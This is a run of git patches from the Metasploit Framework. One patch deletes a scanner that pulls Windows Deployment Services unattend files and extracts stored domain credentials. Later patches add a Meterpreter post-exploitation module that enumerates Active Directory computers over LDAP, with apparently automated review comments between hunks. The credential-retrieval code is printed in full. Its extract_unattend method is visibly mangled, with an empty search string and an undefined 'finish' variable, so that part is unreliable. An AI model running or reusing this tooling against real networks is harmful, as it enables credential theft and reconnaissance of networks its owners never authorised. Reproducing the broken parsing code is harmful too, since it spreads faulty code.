@@ -11,15 +11,11 @@ class Packet UUID = Rex::Proto::DCERPC::UUID # Create a standard DCERPC BIND request packet - def self.make_bind(uuid, vers, xfer_syntax_uuid=UUID.xfer_syntax_uuid, xfer_syntax_vers=UUID.xfer_syntax_vers) + def self.make_bind(uuid, vers) # Process the version strings ("1.0", 1.0, "1", 1) bind_vers_maj, bind_vers_min = UUID.vers_to_nums(vers) - xfer_vers_maj, xfer_vers_min = UUID.vers_to_nums(xfer_syntax_vers) - - if UUID.is? xfer_syntax_uuid - xfer_syntax_uuid = UUID.uuid_pack(xfer_syntax_uuid) - end + xfer_vers_maj, xfer_vers_min = UUID.vers_to_nums(UUID.xfer_syntax_vers) # Create the bind request packet buff = @@ -41,7 +37,7 @@ def self.make_bind(uuid, vers, xfer_syntax_uuid=UUID.xfer_syntax_uuid, xfer_synt UUID.uuid_pack(uuid), # interface uuid bind_vers_maj, # interface major version bind_vers_min, # interface minor version - xfer_syntax_uuid, # transfer syntax + UUID.xfer_syntax_uuid, # transfer syntax xfer_vers_maj, # syntax major version xfer_vers_min, # syntax minor version ].pack('CCCCNvvVvvVVvvA16vvA16vv') diff --git a/lib/rex/proto/dcerpc/wdscp.rb b/lib/rex/proto/dcerpc/wdscp.rb deleted file mode 100644 index 519f2ffb9071..000000000000 --- a/lib/rex/proto/dcerpc/wdscp.rb +++ /dev/null @@ -1,3 +0,0 @@ -# -*- coding: binary -*- -require 'rex/proto/dcerpc/wdscp/constants' -require 'rex/proto/dcerpc/wdscp/packet' diff --git a/lib/rex/proto/dcerpc/wdscp/constants.rb b/lib/rex/proto/dcerpc/wdscp/constants.rb deleted file mode 100644 index 1df1625a4ff2..000000000000 --- a/lib/rex/proto/dcerpc/wdscp/constants.rb +++ /dev/null 
@@ -1,89 +0,0 @@ -# -*- coding: binary -*- -module Rex -module Proto -module DCERPC -module WDSCP -# http://msdn.microsoft.com/en-us/library/dd891406(prot.20).aspx -# http://msdn.microsoft.com/en-us/library/dd541332(prot.20).aspx -# Not all values defined by the spec have been imported... -class Constants - WDSCP_RPC_UUID = "1A927394-352E-4553-AE3F-7CF4AAFCA620" - OS_DEPLOYMENT_GUID = "\x5a\xeb\xde\xd8\xfd\xef\xb2\x43\x99\xfc\x1a\x8a\x59\x21\xc2\x27" - - VAR_NAME_ARCHITECTURE = "ARCHITECTURE" - VAR_NAME_CLIENT_GUID = "CLIENT_GUID" - VAR_NAME_CLIENT_MAC = "CLIENT_MAC" - VAR_NAME_VERSION = "VERSION" - VAR_NAME_MESSAGE_TYPE = "MESSAGE_TYPE" - VAR_NAME_TRANSACTION_ID = "TRANSACTION_ID" - VAR_NAME_FLAGS = "FLAGS" - VAR_NAME_CC = "CC" #Client Capabilities - VAR_NAME_IMDC = "IMDC" - - VAR_TYPE_LOOKUP = { - VAR_NAME_ARCHITECTURE => :ULONG, - VAR_NAME_CLIENT_GUID => :WSTRING, - VAR_NAME_CLIENT_MAC => :WSTRING, - VAR_NAME_VERSION => :ULONG, - VAR_NAME_MESSAGE_TYPE => :ULONG, - VAR_NAME_TRANSACTION_ID => :WSTRING, - VAR_NAME_FLAGS => :ULONG, - VAR_NAME_CC => :ULONG, - VAR_NAME_IMDC => :ULONG - } - - CC_FLAGS = { - :V2 => 1, - :VHDX => 2 - } - - DOMAIN_JOIN_FLAGS = { - :JOIN_DOMAIN => 1, - :ACCOUNT_EXISTS => 2, - :PRESTAGE_USING_MAC => 3, - :RESET_BOOT_PROGRAM => 256 - } - - ARCHITECTURE = { - :X64 => 9, - :X86 => 0, - :IA64 => 6, - :ARM => 5 - } - - PACKET_TYPE = { - :REQUEST => 1, - :REPLY => 2 - } - - OPCODE = { - :IMG_ENUMERATE => 2, - :LOG_INIT => 3, - :LOG_MSG => 4, - :GET_CLIENT_UNATTEND => 5, - :GET_UNATTEND_VARIABLES => 6, - :GET_DOMAIN_JOIN_INFORMATION => 7, - :RESET_BOOT_PROGRAM => 8, - :GET_MACHINE_DRIVER_PACKAGES => 200 - } - - BASE_TYPE = { - :BYTE => 0x0001, - :USHORT => 0x0002, - :ULONG => 0x0004, - :ULONG64 => 0x0008, - :STRING => 0x0010, - :WSTRING => 0x0020, - :BLOB => 0x0040 - } - - TYPE_MODIFIER = { - :NONE => 0x0000, - :ARRAY => 0x1000 - } - -end -end -end -end -end 
diff --git a/lib/rex/proto/dcerpc/wdscp/packet.rb b/lib/rex/proto/dcerpc/wdscp/packet.rb
deleted file mode 100644
index 972f0ed2a4ef..000000000000
--- a/lib/rex/proto/dcerpc/wdscp/packet.rb
+++ /dev/null
@@ -1,74 +0,0 @@ -# -*- coding: binary -*- -module Rex -module Proto -module DCERPC -module WDSCP -class Packet - - WDS_CONST = Rex::Proto::DCERPC::WDSCP::Constants - - def initialize(packet_type, opcode) - if opcode.nil? || packet_type.nil? - raise(ArgumentError, "Packet arguments cannot be nil") - end - - @variables = [] - @packet_type = WDS_CONST::PACKET_TYPE[packet_type] - @opcode = WDS_CONST::OPCODE[opcode] - end - - def add_var(name, type_mod=0, value_length=nil, array_size=0, value) - padding = 0 - value_type = WDS_CONST::BASE_TYPE[WDS_CONST::VAR_TYPE_LOOKUP[name]] - name = name.encode('UTF-16LE').unpack('H*')[0] - - value_length ||= value.length - - len = 16 * (1 + (value_length/16)) # Variable block total size should be evenly divisible by 16. - @variables << [name, padding, value_type, type_mod, value_length, array_size, value].pack('H132vvvVVa%i' % len) - end - - def create - packet = [] - var_count = @variables.count - - packet_size = 0 - @variables.each do |var| - packet_size += var.length - end - - packet_size += 16 # variables + operation - - # These bytes are not part of the spec but are not part of DCERPC according to Wireshark - # Perhaps something from MSRPC specific? Basically length of the WDSCP packet twice... - packet << [packet_size+40].pack('Q')*2 - packet << create_endpoint_header(packet_size) - packet << create_operation_header(packet_size, var_count, @packet_type, @opcode) - packet.concat(@variables) - - return packet.join - end - - def create_operation_header(packet_size, var_count, packet_type=:REQUEST, opcode) - return [ packet_size, # PacketSize - 256, # Version - packet_type, # Packet_Type - 0, # Padding - opcode, # Opcode - var_count, # Variable Count - ].pack('VvCCVV') - end - - def create_endpoint_header(packet_size) - return [ 40, # Header_Size - 256, # Version - packet_size, # Packet_Size - This doesn't differ from operation header despite the spec... 
- WDS_CONST::OS_DEPLOYMENT_GUID, # GUID - "\x00"*16, # Reserved - ].pack('vvVa16a16') - end -end -end -end -end -end diff --git a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb b/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb deleted file mode 100644 index f973f09e4c26..000000000000 --- a/modules/auxiliary/scanner/dcerpc/windows_deployment_services.rb +++ /dev/null 
@@ -1,221 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require 'rex/proto/dcerpc' -require 'rex/proto/dcerpc/wdscp' -require 'rex/parser/unattend' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::DCERPC - include Msf::Auxiliary::Report - include Msf::Auxiliary::Scanner - - DCERPCPacket = Rex::Proto::DCERPC::Packet - DCERPCClient = Rex::Proto::DCERPC::Client - DCERPCResponse = Rex::Proto::DCERPC::Response - DCERPCUUID = Rex::Proto::DCERPC::UUID - WDS_CONST = Rex::Proto::DCERPC::WDSCP::Constants - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Microsoft Windows Deployment Services Unattend Retrieval', - 'Description' => %q{ - This module retrieves the client unattend file from Windows - Deployment Services RPC service and parses out the stored credentials. - Tested against Windows 2008 R2 - }, - 'Author' => [ 'Ben Campbell ' ], - 'License' => MSF_LICENSE, - 'Version' => '', - 'References' => - [ - [ 'MSDN', 'http://msdn.microsoft.com/en-us/library/dd891255(prot.20).aspx'], - [ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'] - ], - )) - - register_options( - [ - Opt::RPORT(5040), - ], self.class) - - deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion') - - register_advanced_options( - [ - OptBool.new('ENUM_ARM', [true, 'Enumerate Unattend for ARM architectures (not currently supported by Windows and will cause an error in System Event Log)', false]) - ], self.class) - end - - def run_host(ip) - begin - query_host(ip) - rescue ::Interrupt - raise $! 
- rescue ::Exception => e - print_error("#{ip}:#{rport} error: #{e}") - end - end - - def query_host(rhost) - # Create a handler with our UUID and Transfer Syntax - self.handle = Rex::Proto::DCERPC::Handle.new( - [ - WDS_CONST::WDSCP_RPC_UUID, - '1.0', - '71710533-beba-4937-8319-b5dbef9ccc36', - 1 - ], - 'ncacn_ip_tcp', - rhost, - [datastore['RPORT']] - ) - - print_status("Binding to #{handle} ...") - - self.dcerpc = Rex::Proto::DCERPC::Client.new(self.handle, self.sock) - print_good("Bound to #{handle}") - - report_service( - :host => rhost, - :port => datastore['RPORT'], - :proto => 'tcp', - :name => "dcerpc", - :info => "#{WDS_CONST::WDSCP_RPC_UUID} v1.0 Windows Deployment Services" - ) - - table = Rex::Ui::Text::Table.new({ - 'Header' => 'Windows Deployment Services', - 'Indent' => 1, - 'Columns' => ['Architecture', 'Type', 'Domain', 'Username', 'Password'] - }) - - creds_found = false - - WDS_CONST::ARCHITECTURE.each do |architecture| - if architecture[0] == :ARM && !datastore['ENUM_ARM'] - vprint_status "Skipping #{architecture[0]} architecture due to adv option" - next - end - - begin - result = request_client_unattend(architecture) - rescue ::Rex::Proto::DCERPC::Exceptions::Fault => e - vprint_error(e.to_s) - print_error("#{rhost} DCERPC Fault - Windows Deployment Services is present but not configured. Perhaps an SCCM installation.") - return - end - - unless result.nil? - loot_unattend(architecture[0], result) - results = parse_client_unattend(result) - - results.each do |result| - unless result.empty? - unless result['username'].nil? || result['password'].nil? 
- print_good("Retrived #{result['type']} credentials for #{architecture[0]}") - creds_found = true - domain = "" - domain = result['domain'] if result['domain'] - report_creds(domain, result['username'], result['password']) - table << [architecture[0], result['type'], domain, result['username'], result['password']] - end - end - end - end - end - - if creds_found - print_line - table.print - print_line - else - print_error("No Unattend files received, service is unlikely to be configured for completely unattended installation.") - end - end - - def request_client_unattend(architecture) - # Construct WDS Control Protocol Message - packet = Rex::Proto::DCERPC::WDSCP::Packet.new(:REQUEST, :GET_CLIENT_UNATTEND) - packet.add_var( WDS_CONST::VAR_NAME_ARCHITECTURE, [architecture[1]].pack('C')) - packet.add_var( WDS_CONST::VAR_NAME_CLIENT_GUID, - "\x35\x00\x36\x00\x34\x00\x44\x00\x41\x00\x36\x00\x31\x00\x44\x00"\ - "\x32\x00\x41\x00\x45\x00\x31\x00\x41\x00\x41\x00\x42\x00\x32\x00"\ - "\x38\x00\x36\x00\x34\x00\x46\x00\x34\x00\x34\x00\x46\x00\x32\x00"\ - "\x38\x00\x32\x00\x46\x00\x30\x00\x34\x00\x33\x00\x34\x00\x30\x00"\ - "\x00\x00") - packet.add_var( WDS_CONST::VAR_NAME_CLIENT_MAC, - "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"\ - "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00"\ - "\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x35\x00\x30\x00"\ - "\x35\x00\x36\x00\x33\x00\x35\x00\x31\x00\x41\x00\x37\x00\x35\x00"\ - "\x00\x00") - packet.add_var( WDS_CONST::VAR_NAME_VERSION,"\x00\x00\x00\x01\x00\x00\x00\x00") - wdsc_packet = packet.create - - print_status("Sending #{architecture[0]} Client Unattend request ...") - response = dcerpc.call(0, wdsc_packet) - - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - vprint_status('Received response ...') - data = dcerpc.last_response.stub_data - - # Check WDSC_Operation_Header OpCode-ErrorCode is success 0x000000 - op_error_code = data.unpack('i*')[18] - if 
op_error_code == 0 - if data.length < 277 - vprint_error("No Unattend received for #{architecture[0]} architecture") - return nil - else - vprint_status("Received #{architecture[0]} unattend file ...") - return extract_unattend(data) - end - else - vprint_error("Error code received for #{architecture[0]}: #{op_error_code}") - return nil - end - end - end - - def extract_unattend(data) - start = data.index('')+10 - return data[start..finish] - end - - def parse_client_unattend(data) - begin - xml = REXML::Document.new(data) - - rescue REXML::ParseException => e - print_error("Invalid XML format") - vprint_line(e.message) - end - - return Rex::Parser::Unattend.parse(xml).flatten - end - - def loot_unattend(archi, data) - return if data.empty? - p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, archi, "Windows Deployment Services") - print_status("Raw version of #{archi} saved as: #{p}") - end - - def report_creds(domain, user, pass) - report_auth_info( - :host => rhost, - :port => 4050, - :sname => 'dcerpc', - :proto => 'tcp', - :source_id => nil, - :source_type => "aux", - :user => "#{domain}\\#{user}", - :pass => pass) - end -end From b5fd3463d70e01c6154551033312bbfd11ff96da Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Mon, 17 Dec 2012 14:07:35 +0000 Subject: [PATCH 007/421] Initial working AD_LDAP lookup --- .../stdapi/railgun/def/def_wldap32.rb | 78 ++++++++- .../post/windows/gather/enum_ad_computers.rb | 163 ++++++++++++++++++ 2 files changed, 235 insertions(+), 6 deletions(-) create mode 100644 modules/post/windows/gather/enum_ad_computers.rb diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb index e13e618f5481..ff19667fbdcc 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb 
@@ -7,23 +7,89 @@ module Stdapi module Railgun module Def -class Def_wldap32 +class Def_wlanapi def self.create_dll(dll_path = 'wldap32') dll = DLL.new(dll_path, ApiConstants.manager) - - dll.add_function( 'ldap_sslinitW', 'PDWORD',[ + + dll.add_function('ldap_sslinitA', 'DWORD',[ ['PCHAR', 'HostName', 'in'], ['DWORD', 'PortNumber', 'in'], ['DWORD', 'secure', 'in'] ]) - - dll.add_function( 'ldap_simple_bind_sW', 'DWORD',[ + + dll.add_function('ldap_bind_sA', 'DWORD',[ ['DWORD', 'ld', 'in'], ['PCHAR', 'dn', 'in'], - ['PCHAR', 'passwd', 'in'] + ['PCHAR', 'cred', 'in'], + ['DWORD', 'method', 'in'] + ]) + + dll.add_function('ldap_search_sA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['PCHAR', 'base', 'in'], + ['DWORD', 'scope', 'in'], + ['PCHAR', 'filter', 'in'], + ['PCHAR', 'attrs[]', 'in'], + ['DWORD', 'attrsonly', 'in'], + ['PDWORD', 'res', 'out'] + ]) + + dll.add_function('ldap_count_entries', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'res', 'in'] + ]) + dll.add_function('ldap_first_entry', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'res', 'in'] + ]) + + dll.add_function('ldap_next_entry', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'] ]) + dll.add_function('ldap_first_attributeA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['DWORD', 'ptr', 'in'] + ]) + + dll.add_function('ldap_next_attributeA', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['DWORD', 'ptr', 'inout'] + ]) + + dll.add_function('ldap_count_values', 'DWORD',[ + ['DWORD', 'vals', 'in'], + ]) + + dll.add_function('ldap_get_values', 'DWORD',[ + ['DWORD', 'ld', 'in'], + ['DWORD', 'entry', 'in'], + ['PCHAR', 'attr', 'in'] + ]) + + dll.add_function('ldap_value_free', 'DWORD',[ + ['DWORD', 'vals', 'in'], + ]) + + dll.add_function('ldap_memfree', 'VOID',[ + ['DWORD', 'block', 'in'], + ]) + + dll.add_function('ber_free', 'VOID',[ + ['DWORD', 'pBerElement', 'in'], + ['DWORD', 'fbuf', 'in'], + ]) + + dll.add_function('LdapGetLastError', 'DWORD',[]) + + 
dll.add_function('ldap_err2string', 'DWORD',[ + ['DWORD', 'err', 'in'] + ]) + return dll end diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb new file mode 100644 index 000000000000..645668501869 --- /dev/null +++ b/modules/post/windows/gather/enum_ad_computers.rb 
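Review bot: The class is renamed to `Def_wlanapi` although the file is def_wldap32.rb and `create_dll` still defaults to 'wldap32', so the definition no longer matches the DLL it describes and would clash with any existing class of that name; keep `class Def_wldap32`. In the same hunk `ldap_search_sA` declares `['PCHAR', 'attrs[]', 'in']` for a parameter that is an array of strings in the C API, so a caller can only safely pass nil. A comment on that line, `# attrs is a char** in the C API; pass nil until array marshalling is supported`, would stop someone passing a single string.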
@@ -0,0 +1,163 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +# Multi platform requiere +require 'msf/core/post/common' +require 'msf/core/post/file' + +require 'msf/core/post/windows/registry' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + include Msf::Post::File + + include Msf::Post::Windows::Registry + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Gather Enumerate Computers', + 'Description' => %q{ + This module will enumerate computers included in the primary Domain. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win'], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + # Run Method for when run command is issued + def run + + attributes = [ 'dNSHostName', 'distinguishedName', 'description', 'operatingSystem', 'operatingSystemServicePack', 'serverReferenceBL', 'userAccountControl'] + #attributes = [ 'objectClass','cn', 'description', 'distinguishedName','instanceType','whenCreated', + # 'whenChanged','uSNCreated','uSNChanged','name','objectGUID', + # 'userAccountControl','badPwdCount','codePage','countryCode', + # 'badPasswordTime','lastLogoff','lastLogon','localPolicyFlags', + # 'pwdLastSet','primaryGroupID','objectSid','accountExpires', + # 'logonCount','sAMAccountName','sAMAccountType','operatingSystem', + # 'operatingSystemVersion','operatingSystemServicePack','serverReferenceBL', + # 'dNSHostName','rIDSetPreferences','servicePrincipalName','objectCategory', + # 'netbootSCPBL','isCriticalSystemObject','frsComputerReferenceBL', + # 'lastLogonTimestamp','msDS-SupportedEncryptionTypes' + # ] + + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? + unless client.railgun.known_dll_names.include? 
'wldap32' + print_status ("Adding wldap32.dll") + client.railgun.add_dll('wldap32','C:\\WINDOWS\\system32\\wldap32.dll') + end + wldap32 = client.railgun.wldap32 + + + + print_status ("Initialize LDAP connection.") + ldap_handle = wldap32.ldap_sslinitA(nil, 389, 0)['return'] + vprint_status("LDAP Handle: #{ldap_handle}") + + + + print_status ("Bindings to LDAP server.") + bind = wldap32.ldap_bind_sA(ldap_handle, nil, nil, 0x0486) #LDAP_AUTH_NEGOTIATE < add to ../api_constants.rb? + + + print_status ("Searching LDAP directory.") + + lDAP_SCOPE_BASE = 0 + lDAP_SCOPE_ONELEVEL = 1 + lDAP_SCOPE_SUBTREE = 2 + + base = "DC=test,DC=lab" + scope = lDAP_SCOPE_SUBTREE + + search = wldap32.ldap_search_sA(ldap_handle, base, scope, "(objectClass=computer)", nil, 0, 4) + vprint_status("search: #{search}") + + if search['return'] != 0 + client.railgun.add_function('wldap32', 'ldap_msgfree', 'DWORD', [ + ['DWORD', 'res', 'in'] + ]) + + wldap32.ldap_msgfree(search['res']) + + print_error("No results") + return + end + + print_status ("Counting number of search results") + search_count = wldap32.ldap_count_entries(ldap_handle, search['res'])['return'] + vprint_status("Search count: #{search_count}") + + + print_status("Retrieve results") + entries = {} + for i in 0..(search_count-1) + print_line "-"*46 + if i==0 + entries[i] = wldap32.ldap_first_entry(ldap_handle, search['res'])['return'] + else + entries[i] = wldap32.ldap_next_entry(ldap_handle, entries[i-1])['return'] + end + vprint_status("Entry #{i}: #{entries[i]}") + + #addr = valloc + #attribute = wldap32.ldap_first_attributeA(ldap_handle, entries[i], addr) + #puts attribute + #p_attribute = attribute['return'] + #vprint_status("p_attribute: #{p_attribute}") + #addr2 = client.railgun.memread(addr,16).unpack('V*')[0] + #puts addr2 + #attr = client.railgun.memread(p_attribute, 16) + + attributes.each do |attr| + print_status("Attr: #{attr}") + + pp_value = wldap32.ldap_get_values(ldap_handle, entries[i], attr)['return'] + 
vprint_status("ppValue: 0x#{pp_value.to_s(16)}") + + if pp_value == 0 + vprint_error("No attribute value returned.") + else + count = wldap32.ldap_count_values(pp_value)['return'] + vprint_status "Value count: #{count}" + + if count < 1 + vprint_error("Bad Value List") + else + for j in 0..(count-1) + p_value = client.railgun.memread(pp_value+(j*4), 4).unpack('V*')[0] + vprint_status "p_value: 0x#{p_value.to_s(16)}" + value = read_value(p_value) + print_status "Value: #{value}" + end + end + end + + if pp_value != 0 + vprint_status("Free value memory.") + wldap32.ldap_value_free(pp_value) + end + + #puts "free attribute" + #wldap32.ldap_memfree(p_attribute) + + #attribute = wldap32.ldap_next_attributeA(ldap_handle, entries[i], addr2) + #p_attribute = attribute['return'] + #vprint_status("Next Attribute: #{attribute}") + #if p_attribute == 0 + # attr = nil + #else + # attr = client.railgun.memread(p_attribute, 16).strip + #end + end + end + end +end From 6a92bd609ae1727e3c8bdb44d0f7aa699749dc6c Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Mon, 17 Dec 2012 15:29:04 +0000 Subject: [PATCH 008/421] Tidying and refactoring --- .../stdapi/railgun/def/def_wldap32.rb | 6 +- .../post/windows/gather/enum_ad_computers.rb | 61 +++++-------------- 2 files changed, 19 insertions(+), 48 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb index ff19667fbdcc..93a26496ee0f 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wldap32.rb @@ -7,7 +7,7 @@ module Stdapi module Railgun module Def -class Def_wlanapi +class Def_wldap32 def self.create_dll(dll_path = 'wldap32') dll = DLL.new(dll_path, ApiConstants.manager) 
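Review bot: The result message is released only on the failure branch: `wldap32.ldap_msgfree(search['res'])` runs when `search['return'] != 0`, but after a successful search nothing frees `search['res']` and nothing closes `ldap_handle`, so every run leaves allocations and an open LDAP session behind in the process that made the calls. Free the result after the entry loop with `wldap32.ldap_msgfree(search['res'])` (which means declaring the function up front rather than inside the error branch) and close the handle in an `ensure`; no unbind function is declared in def_wldap32.rb in this patch, so that needs adding too. The same branch prints `No results` for any non-zero return, which is an LDAP error code rather than an empty result; `print_error("LDAP search failed: #{search['return']}")` would be more accurate. `read_value` is called in the value loop but is not defined anywhere in this new file.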
@@ -90,6 +90,10 @@ def self.create_dll(dll_path = 'wldap32') ['DWORD', 'err', 'in'] ]) + dll.add_function('ldap_msgfree', 'DWORD', [ + ['DWORD', 'res', 'in'] + ]) + return dll end diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 645668501869..6572188234f7 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Gather Enumerate Computers', + 'Name' => 'Windows Gather AD Enumerate Computers', 'Description' => %q{ This module will enumerate computers included in the primary Domain. }, @@ -33,8 +33,13 @@ def initialize(info={}) 'SessionTypes' => [ 'meterpreter' ] )) end + + def read_value(addr) + val_size = client.railgun.memread(addr-4,4).unpack('V*')[0] + value = client.railgun.memread(addr, val_size) + return value.strip + end - # Run Method for when run command is issued def run attributes = [ 'dNSHostName', 'distinguishedName', 'description', 'operatingSystem', 'operatingSystemServicePack', 'serverReferenceBL', 'userAccountControl'] 
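Review bot: `read_value` takes the value length from the four bytes in front of the string (`memread(addr-4,4)`), a layout that nothing on this page shows `ldap_get_values` guaranteeing, and then reads that many bytes with no upper bound, so a wrong prefix becomes an oversized or failing remote read. Cap the length before the second read, e.g. `val_size = [val_size, MAX_VALUE_LEN].min`, where `MAX_VALUE_LEN` is a placeholder for a constant you would define. Document the assumption above the method: `# Assumes a 4-byte little-endian length precedes the value; this layout is undocumented`. `unpack('V*')[0]` can be written `unpack('V').first`, since only one word is read.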
@@ -51,53 +56,36 @@ def run # ] print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? - unless client.railgun.known_dll_names.include? 'wldap32' - print_status ("Adding wldap32.dll") - client.railgun.add_dll('wldap32','C:\\WINDOWS\\system32\\wldap32.dll') - end - wldap32 = client.railgun.wldap32 - + wldap32 = client.railgun.wldap32 print_status ("Initialize LDAP connection.") ldap_handle = wldap32.ldap_sslinitA(nil, 389, 0)['return'] vprint_status("LDAP Handle: #{ldap_handle}") - - print_status ("Bindings to LDAP server.") - bind = wldap32.ldap_bind_sA(ldap_handle, nil, nil, 0x0486) #LDAP_AUTH_NEGOTIATE < add to ../api_constants.rb? - + bind = wldap32.ldap_bind_sA(ldap_handle, nil, nil, 0x0486) #LDAP_AUTH_NEGOTIATE print_status ("Searching LDAP directory.") - lDAP_SCOPE_BASE = 0 - lDAP_SCOPE_ONELEVEL = 1 - lDAP_SCOPE_SUBTREE = 2 - base = "DC=test,DC=lab" - scope = lDAP_SCOPE_SUBTREE + scope = 2 #LDAP_SCOPE_SUBTREE search = wldap32.ldap_search_sA(ldap_handle, base, scope, "(objectClass=computer)", nil, 0, 4) vprint_status("search: #{search}") if search['return'] != 0 - client.railgun.add_function('wldap32', 'ldap_msgfree', 'DWORD', [ - ['DWORD', 'res', 'in'] - ]) - - wldap32.ldap_msgfree(search['res']) - print_error("No results") + wldap32.ldap_msgfree(search['res']) return end - print_status ("Counting number of search results") search_count = wldap32.ldap_count_entries(ldap_handle, search['res'])['return'] - vprint_status("Search count: #{search_count}") + print_status("Entries retrieved: #{search_count}") - print_status("Retrieve results") + print_status("Retrieving results...") + entries = {} for i in 0..(search_count-1) print_line "-"*46 
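Review bot: Neither `ldap_handle` nor `bind` is checked before the search: a 0 handle from `ldap_sslinitA` and a failed `ldap_bind_sA` both fall through to `ldap_search_sA`, and the `bind` local holds the whole result hash and is never read. Add `return print_error('Unable to connect to LDAP server') if ldap_handle == 0` after the init call, and compare `bind['return']` with 0 before searching. `base = "DC=test,DC=lab"` is still hard-coded, so the search only makes sense in the author's lab domain. The magic values `0x0486` and `2` would read better as named constants than as literals explained by trailing comments. `run` continues outside this hunk.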
@@ -107,15 +95,6 @@ def run entries[i] = wldap32.ldap_next_entry(ldap_handle, entries[i-1])['return'] end vprint_status("Entry #{i}: #{entries[i]}") - - #addr = valloc - #attribute = wldap32.ldap_first_attributeA(ldap_handle, entries[i], addr) - #puts attribute - #p_attribute = attribute['return'] - #vprint_status("p_attribute: #{p_attribute}") - #addr2 = client.railgun.memread(addr,16).unpack('V*')[0] - #puts addr2 - #attr = client.railgun.memread(p_attribute, 16) attributes.each do |attr| print_status("Attr: #{attr}") @@ -145,18 +124,6 @@ def run vprint_status("Free value memory.") wldap32.ldap_value_free(pp_value) end - - #puts "free attribute" - #wldap32.ldap_memfree(p_attribute) - - #attribute = wldap32.ldap_next_attributeA(ldap_handle, entries[i], addr2) - #p_attribute = attribute['return'] - #vprint_status("Next Attribute: #{attribute}") - #if p_attribute == 0 - # attr = nil - #else - # attr = client.railgun.memread(p_attribute, 16).strip - #end end end end From d91e566d541ba557a0aa9b1b56e2f12985062165 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Wed, 19 Dec 2012 09:06:58 +0000 Subject: [PATCH 009/421] Further refactoring --- .../post/windows/gather/enum_ad_computers.rb | 129 ++++++++++++------ 1 file changed, 90 insertions(+), 39 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 6572188234f7..338fe1f2a664 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb 
@@ -5,21 +5,13 @@ # http://metasploit.com/ ## -require 'msf/core' require 'rex' - -# Multi platform requiere -require 'msf/core/post/common' -require 'msf/core/post/file' - -require 'msf/core/post/windows/registry' +require 'msf/core' +require 'msf/core/auxiliary/report' class Metasploit3 < Msf::Post - include Msf::Post::Common - include Msf::Post::File - - include Msf::Post::Windows::Registry + include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, 
@@ -28,21 +20,54 @@ def initialize(info={}) This module will enumerate computers included in the primary Domain. }, 'License' => MSF_LICENSE, - 'Author' => [ 'Ben Campbell '], - 'Platform' => [ 'win'], + 'Author' => [ 'Ben Campbell ' ], + 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) end - + def read_value(addr) val_size = client.railgun.memread(addr-4,4).unpack('V*')[0] value = client.railgun.memread(addr, val_size) return value.strip end - - def run + def run + print_status("Connecting to default LDAP server") + session_handle = bind_default_ldap_server + + if session_handle == 0 + return + end + + print_status("Querying default naming context") + defaultNamingContext = query_ldap(session_handle, "", 0, "(objectClass=computer)", ["defaultNamingContext"])[0]['attributes'][0]['values'] + print_status("Default Naming Context #{defaultNamingContext}") + attributes = [ 'dNSHostName', 'distinguishedName', 'description', 'operatingSystem', 'operatingSystemServicePack', 'serverReferenceBL', 'userAccountControl'] + + print_status("Querying computer objects - Please wait...") + results = query_ldap(session_handle, defaultNamingContext, 2, "(objectClass=computer)", attributes) + + results_table = Rex::Ui::Text::Table.new( 